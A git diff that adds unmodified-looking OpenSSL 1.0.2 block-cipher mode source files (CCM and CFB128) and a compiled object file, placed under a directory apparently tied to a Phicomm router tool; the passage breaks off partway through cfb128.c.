diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ccm128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ccm128.c
new file mode 100644
index 0000000..c1ded0f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ccm128.c
@@ -0,0 +1,479 @@
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+/*
+ * First you setup M and L parameters and pass the key schedule. This is
+ * called once per session setup...
+ */
+void CRYPTO_ccm128_init(CCM128_CONTEXT *ctx,
+                        unsigned int M, unsigned int L, void *key,
+                        block128_f block)
+{
+    memset(ctx->nonce.c, 0, sizeof(ctx->nonce.c));
+    ctx->nonce.c[0] = ((u8)(L - 1) & 7) | (u8)(((M - 2) / 2) & 7) << 3;
+    ctx->blocks = 0;
+    ctx->block = block;
+    ctx->key = key;
+}
+
+/* !!! Following interfaces are to be called *once* per packet !!! */
+
+/* Then you setup per-message nonce and pass the length of the message */
+int CRYPTO_ccm128_setiv(CCM128_CONTEXT *ctx,
+                        const unsigned char *nonce, size_t nlen, size_t mlen)
+{
+    unsigned int L = ctx->nonce.c[0] & 7; /* the L parameter */
+
+    if (nlen < (14 - L))
+        return -1;              /* nonce is too short */
+
+    if (sizeof(mlen) == 8 && L >= 3) {
+        ctx->nonce.c[8] = (u8)(mlen >> (56 % (sizeof(mlen) * 8)));
+        ctx->nonce.c[9] = (u8)(mlen >> (48 % (sizeof(mlen) * 8)));
+        ctx->nonce.c[10] = (u8)(mlen >> (40 % (sizeof(mlen) * 8)));
+        ctx->nonce.c[11] = (u8)(mlen >> (32 % (sizeof(mlen) * 8)));
+    } else
+        ctx->nonce.u[1] = 0;
+
+    ctx->nonce.c[12] = (u8)(mlen >> 24);
+    ctx->nonce.c[13] = (u8)(mlen >> 16);
+    ctx->nonce.c[14] = (u8)(mlen >> 8);
+    ctx->nonce.c[15] = (u8)mlen;
+
+    ctx->nonce.c[0] &= ~0x40;   /* clear Adata flag */
+    memcpy(&ctx->nonce.c[1], nonce, 14 - L);
+
+    return 0;
+}
+
+/* Then you pass additional authentication data, this is optional */
+void CRYPTO_ccm128_aad(CCM128_CONTEXT *ctx,
+                       const unsigned char *aad, size_t alen)
+{
+    unsigned int i;
+    block128_f block = ctx->block;
+
+    if (alen == 0)
+        return;
+
+    ctx->nonce.c[0] |= 0x40;    /* set Adata flag */
+    (*block) (ctx->nonce.c, ctx->cmac.c, ctx->key), ctx->blocks++;
+
+    if (alen < (0x10000 - 0x100)) {
+        ctx->cmac.c[0] ^= (u8)(alen >> 8);
+        ctx->cmac.c[1] ^= (u8)alen;
+        i = 2;
+    } else if (sizeof(alen) == 8
+               && alen >= (size_t)1 << (32 % (sizeof(alen) * 8))) {
+        ctx->cmac.c[0] ^= 0xFF;
+        ctx->cmac.c[1] ^= 0xFF;
+        ctx->cmac.c[2] ^= (u8)(alen >> (56 % (sizeof(alen) * 8)));
+        ctx->cmac.c[3] ^= (u8)(alen >> (48 % (sizeof(alen) * 8)));
+        ctx->cmac.c[4] ^= (u8)(alen >> (40 % (sizeof(alen) * 8)));
+        ctx->cmac.c[5] ^= (u8)(alen >> (32 % (sizeof(alen) * 8)));
+        ctx->cmac.c[6] ^= (u8)(alen >> 24);
+        ctx->cmac.c[7] ^= (u8)(alen >> 16);
+        ctx->cmac.c[8] ^= (u8)(alen >> 8);
+        ctx->cmac.c[9] ^= (u8)alen;
+        i = 10;
+    } else {
+        ctx->cmac.c[0] ^= 0xFF;
+        ctx->cmac.c[1] ^= 0xFE;
+        ctx->cmac.c[2] ^= (u8)(alen >> 24);
+        ctx->cmac.c[3] ^= (u8)(alen >> 16);
+        ctx->cmac.c[4] ^= (u8)(alen >> 8);
+        ctx->cmac.c[5] ^= (u8)alen;
+        i = 6;
+    }
+
+    do {
+        for (; i < 16 && alen; ++i, ++aad, --alen)
+            ctx->cmac.c[i] ^= *aad;
+        (*block) (ctx->cmac.c, ctx->cmac.c, ctx->key), ctx->blocks++;
+        i = 0;
+    } while (alen);
+}
+
+/* Finally you encrypt or decrypt the message */
+
+/*
+ * counter part of nonce may not be larger than L*8 bits, L is not larger
+ * than 8, therefore 64-bit counter...
+ */
+static void ctr64_inc(unsigned char *counter)
+{
+    unsigned int n = 8;
+    u8 c;
+
+    counter += 8;
+    do {
+        --n;
+        c = counter[n];
+        ++c;
+        counter[n] = c;
+        if (c)
+            return;
+    } while (n);
+}
+
+int CRYPTO_ccm128_encrypt(CCM128_CONTEXT *ctx,
+                          const unsigned char *inp, unsigned char *out,
+                          size_t len)
+{
+    size_t n;
+    unsigned int i, L;
+    unsigned char flags0 = ctx->nonce.c[0];
+    block128_f block = ctx->block;
+    void *key = ctx->key;
+    union {
+        u64 u[2];
+        u8 c[16];
+    } scratch;
+
+    if (!(flags0 & 0x40))
+        (*block) (ctx->nonce.c, ctx->cmac.c, key), ctx->blocks++;
+
+    ctx->nonce.c[0] = L = flags0 & 7;
+    for (n = 0, i = 15 - L; i < 15; ++i) {
+        n |= ctx->nonce.c[i];
+        ctx->nonce.c[i] = 0;
+        n <<= 8;
+    }
+    n |= ctx->nonce.c[15];      /* reconstructed length */
+    ctx->nonce.c[15] = 1;
+
+    if (n != len)
+        return -1;              /* length mismatch */
+
+    ctx->blocks += ((len + 15) >> 3) | 1;
+    if (ctx->blocks > (U64(1) << 61))
+        return -2;              /* too much data */
+
+    while (len >= 16) {
+#if defined(STRICT_ALIGNMENT)
+        union {
+            u64 u[2];
+            u8 c[16];
+        } temp;
+
+        memcpy(temp.c, inp, 16);
+        ctx->cmac.u[0] ^= temp.u[0];
+        ctx->cmac.u[1] ^= temp.u[1];
+#else
+        ctx->cmac.u[0] ^= ((u64 *)inp)[0];
+        ctx->cmac.u[1] ^= ((u64 *)inp)[1];
+#endif
+        (*block) (ctx->cmac.c, ctx->cmac.c, key);
+        (*block) (ctx->nonce.c, scratch.c, key);
+        ctr64_inc(ctx->nonce.c);
+#if defined(STRICT_ALIGNMENT)
+        temp.u[0] ^= scratch.u[0];
+        temp.u[1] ^= scratch.u[1];
+        memcpy(out, temp.c, 16);
+#else
+        ((u64 *)out)[0] = scratch.u[0] ^ ((u64 *)inp)[0];
+        ((u64 *)out)[1] = scratch.u[1] ^ ((u64 *)inp)[1];
+#endif
+        inp += 16;
+        out += 16;
+        len -= 16;
+    }
+
+    if (len) {
+        for (i = 0; i < len; ++i)
+            ctx->cmac.c[i] ^= inp[i];
+        (*block) (ctx->cmac.c, ctx->cmac.c, key);
+        (*block) (ctx->nonce.c, scratch.c, key);
+        for (i = 0; i < len; ++i)
+            out[i] = scratch.c[i] ^ inp[i];
+    }
+
+    for (i = 15 - L; i < 16; ++i)
+        ctx->nonce.c[i] = 0;
+
+    (*block) (ctx->nonce.c, scratch.c, key);
+    ctx->cmac.u[0] ^= scratch.u[0];
+    ctx->cmac.u[1] ^= scratch.u[1];
+
+    ctx->nonce.c[0] = flags0;
+
+    return 0;
+}
+
+int CRYPTO_ccm128_decrypt(CCM128_CONTEXT *ctx,
+                          const unsigned char *inp, unsigned char *out,
+                          size_t len)
+{
+    size_t n;
+    unsigned int i, L;
+    unsigned char flags0 = ctx->nonce.c[0];
+    block128_f block = ctx->block;
+    void *key = ctx->key;
+    union {
+        u64 u[2];
+        u8 c[16];
+    } scratch;
+
+    if (!(flags0 & 0x40))
+        (*block) (ctx->nonce.c, ctx->cmac.c, key);
+
+    ctx->nonce.c[0] = L = flags0 & 7;
+    for (n = 0, i = 15 - L; i < 15; ++i) {
+        n |= ctx->nonce.c[i];
+        ctx->nonce.c[i] = 0;
+        n <<= 8;
+    }
+    n |= ctx->nonce.c[15];      /* reconstructed length */
+    ctx->nonce.c[15] = 1;
+
+    if (n != len)
+        return -1;
+
+    while (len >= 16) {
+#if defined(STRICT_ALIGNMENT)
+        union {
+            u64 u[2];
+            u8 c[16];
+        } temp;
+#endif
+        (*block) (ctx->nonce.c, scratch.c, key);
+        ctr64_inc(ctx->nonce.c);
+#if defined(STRICT_ALIGNMENT)
+        memcpy(temp.c, inp, 16);
+        ctx->cmac.u[0] ^= (scratch.u[0] ^= temp.u[0]);
+        ctx->cmac.u[1] ^= (scratch.u[1] ^= temp.u[1]);
+        memcpy(out, scratch.c, 16);
+#else
+        ctx->cmac.u[0] ^= (((u64 *)out)[0] = scratch.u[0] ^ ((u64 *)inp)[0]);
+        ctx->cmac.u[1] ^= (((u64 *)out)[1] = scratch.u[1] ^ ((u64 *)inp)[1]);
+#endif
+        (*block) (ctx->cmac.c, ctx->cmac.c, key);
+
+        inp += 16;
+        out += 16;
+        len -= 16;
+    }
+
+    if (len) {
+        (*block) (ctx->nonce.c, scratch.c, key);
+        for (i = 0; i < len; ++i)
+            ctx->cmac.c[i] ^= (out[i] = scratch.c[i] ^ inp[i]);
+        (*block) (ctx->cmac.c, ctx->cmac.c, key);
+    }
+
+    for (i = 15 - L; i < 16; ++i)
+        ctx->nonce.c[i] = 0;
+
+    (*block) (ctx->nonce.c, scratch.c, key);
+    ctx->cmac.u[0] ^= scratch.u[0];
+    ctx->cmac.u[1] ^= scratch.u[1];
+
+    ctx->nonce.c[0] = flags0;
+
+    return 0;
+}
+
+static void ctr64_add(unsigned char *counter, size_t inc)
+{
+    size_t n = 8, val = 0;
+
+    counter += 8;
+    do {
+        --n;
+        val += counter[n] + (inc & 0xff);
+        counter[n] = (unsigned char)val;
+        val >>= 8;              /* carry bit */
+        inc >>= 8;
+    } while (n && (inc || val));
+}
+
+int CRYPTO_ccm128_encrypt_ccm64(CCM128_CONTEXT *ctx,
+                                const unsigned char *inp, unsigned char *out,
+                                size_t len, ccm128_f stream)
+{
+    size_t n;
+    unsigned int i, L;
+    unsigned char flags0 = ctx->nonce.c[0];
+    block128_f block = ctx->block;
+    void *key = ctx->key;
+    union {
+        u64 u[2];
+        u8 c[16];
+    } scratch;
+
+    if (!(flags0 & 0x40))
+        (*block) (ctx->nonce.c, ctx->cmac.c, key), ctx->blocks++;
+
+    ctx->nonce.c[0] = L = flags0 & 7;
+    for (n = 0, i = 15 - L; i < 15; ++i) {
+        n |= ctx->nonce.c[i];
+        ctx->nonce.c[i] = 0;
+        n <<= 8;
+    }
+    n |= ctx->nonce.c[15];      /* reconstructed length */
+    ctx->nonce.c[15] = 1;
+
+    if (n != len)
+        return -1;              /* length mismatch */
+
+    ctx->blocks += ((len + 15) >> 3) | 1;
+    if (ctx->blocks > (U64(1) << 61))
+        return -2;              /* too much data */
+
+    if ((n = len / 16)) {
+        (*stream) (inp, out, n, key, ctx->nonce.c, ctx->cmac.c);
+        n *= 16;
+        inp += n;
+        out += n;
+        len -= n;
+        if (len)
+            ctr64_add(ctx->nonce.c, n / 16);
+    }
+
+    if (len) {
+        for (i = 0; i < len; ++i)
+            ctx->cmac.c[i] ^= inp[i];
+        (*block) (ctx->cmac.c, ctx->cmac.c, key);
+        (*block) (ctx->nonce.c, scratch.c, key);
+        for (i = 0; i < len; ++i)
+            out[i] = scratch.c[i] ^ inp[i];
+    }
+
+    for (i = 15 - L; i < 16; ++i)
+        ctx->nonce.c[i] = 0;
+
+    (*block) (ctx->nonce.c, scratch.c, key);
+    ctx->cmac.u[0] ^= scratch.u[0];
+    ctx->cmac.u[1] ^= scratch.u[1];
+
+    ctx->nonce.c[0] = flags0;
+
+    return 0;
+}
+
+int CRYPTO_ccm128_decrypt_ccm64(CCM128_CONTEXT *ctx,
+                                const unsigned char *inp, unsigned char *out,
+                                size_t len, ccm128_f stream)
+{
+    size_t n;
+    unsigned int i, L;
+    unsigned char flags0 = ctx->nonce.c[0];
+    block128_f block = ctx->block;
+    void *key = ctx->key;
+    union {
+        u64 u[2];
+        u8 c[16];
+    } scratch;
+
+    if (!(flags0 & 0x40))
+        (*block) (ctx->nonce.c, ctx->cmac.c, key);
+
+    ctx->nonce.c[0] = L = flags0 & 7;
+    for (n = 0, i = 15 - L; i < 15; ++i) {
+        n |= ctx->nonce.c[i];
+        ctx->nonce.c[i] = 0;
+        n <<= 8;
+    }
+    n |= ctx->nonce.c[15];      /* reconstructed length */
+    ctx->nonce.c[15] = 1;
+
+    if (n != len)
+        return -1;
+
+    if ((n = len / 16)) {
+        (*stream) (inp, out, n, key, ctx->nonce.c, ctx->cmac.c);
+        n *= 16;
+        inp += n;
+        out += n;
+        len -= n;
+        if (len)
+            ctr64_add(ctx->nonce.c, n / 16);
+    }
+
+    if (len) {
+        (*block) (ctx->nonce.c, scratch.c, key);
+        for (i = 0; i < len; ++i)
+            ctx->cmac.c[i] ^= (out[i] = scratch.c[i] ^ inp[i]);
+        (*block) (ctx->cmac.c, ctx->cmac.c, key);
+    }
+
+    for (i = 15 - L; i < 16; ++i)
+        ctx->nonce.c[i] = 0;
+
+    (*block) (ctx->nonce.c, scratch.c, key);
+    ctx->cmac.u[0] ^= scratch.u[0];
+    ctx->cmac.u[1] ^= scratch.u[1];
+
+    ctx->nonce.c[0] = flags0;
+
+    return 0;
+}
+
+size_t CRYPTO_ccm128_tag(CCM128_CONTEXT *ctx, unsigned char *tag, size_t len)
+{
+    unsigned int M = (ctx->nonce.c[0] >> 3) & 7; /* the M parameter */
+
+    M *= 2;
+    M += 2;
+    if (len < M)
+        return 0;
+    memcpy(tag, ctx->cmac.c, M);
+    return M;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ccm128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/ccm128.o
new file mode 100644
index 0000000000000000000000000000000000000000..9d811bcb08c72fcfd4b16b77961043cbaba152ac
GIT binary patch
literal 5280
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
Lhd#~U&HDcalCvYj

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cfb128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cfb128.c
new file mode 100644
index 0000000..d4ecbd0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cfb128.c
@@ -0,0 +1,254 @@
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+/*
+ * The input and output encrypted as though 128bit cfb mode is being used.
+ * The extra state information to record how much of the 128bit block we have
+ * used is contained in *num;
+ */
+void CRYPTO_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], int *num,
+                           int enc, block128_f block)
+{
+    unsigned int n;
+    size_t l = 0;
+
+    assert(in && out && key && ivec && num);
+
+    n = *num;
+
+    if (enc) {
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+        if (16 % sizeof(size_t) == 0) { /* always true actually */
+            do {
+                while (n && len) {
+                    *(out++) = ivec[n] ^= *(in++);
+                    --len;
+                    n = (n + 1) % 16;
+                }
+# if defined(STRICT_ALIGNMENT)
+                if (((size_t)in | (size_t)out | (size_t)ivec) %
+                    sizeof(size_t) != 0)
+                    break;
+# endif
+                while (len >= 16) {
+                    (*block) (ivec, ivec, key);
+                    for (; n < 16; n += sizeof(size_t)) {
+                        *(size_t *)(out + n) =
+                            *(size_t *)(ivec + n) ^= *(size_t *)(in + n);
+                    }
+                    len -= 16;
+                    out += 16;
+                    in += 16;
+                    n = 0;
+                }
+                if (len) {
+                    (*block) (ivec, ivec, key);
+                    while (len--) {
+                        out[n] = ivec[n] ^= in[n];
+                        ++n;
+                    }
+                }
+                *num = n;
+                return;
+            } while (0);
+        }
+        /* the rest would be commonly eliminated by x86* compiler */
+#endif
+        while (l < len) {
+            if (n == 0) {
+                (*block) (ivec, ivec, key);
+            }
+            out[l] = ivec[n] ^= in[l];
+            ++l;
+            n = (n + 1) % 16;
+        }
+        *num = n;
+    } else {
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+        if (16 % sizeof(size_t) == 0) { /* always true actually */
+            do {
+                while (n && len) {
+                    unsigned char c;
+                    *(out++) = ivec[n] ^ (c = *(in++));
+                    ivec[n] = c;
+                    --len;
+                    n = (n + 1) % 16;
+                }
+# if defined(STRICT_ALIGNMENT)
+                if (((size_t)in | (size_t)out | (size_t)ivec) %
+                    sizeof(size_t) != 0)
+                    break;
+# endif
+                while (len >= 16) {
+                    (*block) (ivec, ivec, key);
+                    for (; n < 16; n += sizeof(size_t)) {
+                        size_t t = *(size_t *)(in + n);
+                        *(size_t *)(out + n) = *(size_t *)(ivec + n) ^ t;
+                        *(size_t *)(ivec + n) = t;
+                    }
+                    len -= 16;
+                    out += 16;
+                    in += 16;
+                    n = 0;
+                }
+                if (len) {
+                    (*block) (ivec, ivec, key);
+                    while (len--) {
+                        unsigned char c;
+                        out[n] = ivec[n] ^ (c = in[n]);
+                        ivec[n] = c;
+                        ++n;
+                    }
+                }
+                *num = n;
+                return;
+            } while (0);
+        }
+        /* the rest would be commonly eliminated by x86* compiler */
+#endif
+        while (l < len) {
+            unsigned char c;
+            if (n == 0) {
+                (*block) (ivec, ivec, key);
+            }
+            out[l] = ivec[n] ^ (c = in[l]);
+            ivec[n] = c;
+            ++l;
+            n = (n + 1) % 16;
+        }
+        *num = n;
+    }
+}
+
+/*
+ * This expects a single block of size nbits for both in and out. Note that
+ * it corrupts any extra bits in the last byte of out
+ */
+static void cfbr_encrypt_block(const unsigned char *in, unsigned char *out,
+                               int nbits, const void *key,
+                               unsigned char ivec[16], int enc,
+                               block128_f block)
+{
+    int n, rem, num;
+    unsigned char ovec[16 * 2 + 1]; /* +1 because we dererefence (but don't
+                                     * use) one byte off the end */
+
+    if (nbits <= 0 || nbits > 128)
+        return;
+
+    /* fill in the first half of the new IV with the current IV */
+    memcpy(ovec, ivec, 16);
+    /* construct the new IV */
+    (*block) (ivec, ivec, key);
+    num = (nbits + 7) / 8;
+    if (enc)                    /* encrypt the input */
+        for (n = 0; n < num; ++n)
+            out[n] = (ovec[16 + n] = in[n] ^ ivec[n]);
+    else                        /* decrypt the input */
+        for (n = 0; n < num; ++n)
+            out[n] = (ovec[16 + n] = in[n]) ^ ivec[n];
+    /* shift ovec left... */
+    rem = nbits % 8;
+    num = nbits / 8;
+    if (rem == 0)
+        memcpy(ivec, ovec + num, 16);
+    else
+        for (n = 0; n < 16; ++n)
+            ivec[n] = ovec[n + num] << rem | ovec[n + num + 1] >> (8 - rem);
+
+    /* it is not necessary to cleanse ovec, since the IV is not secret */
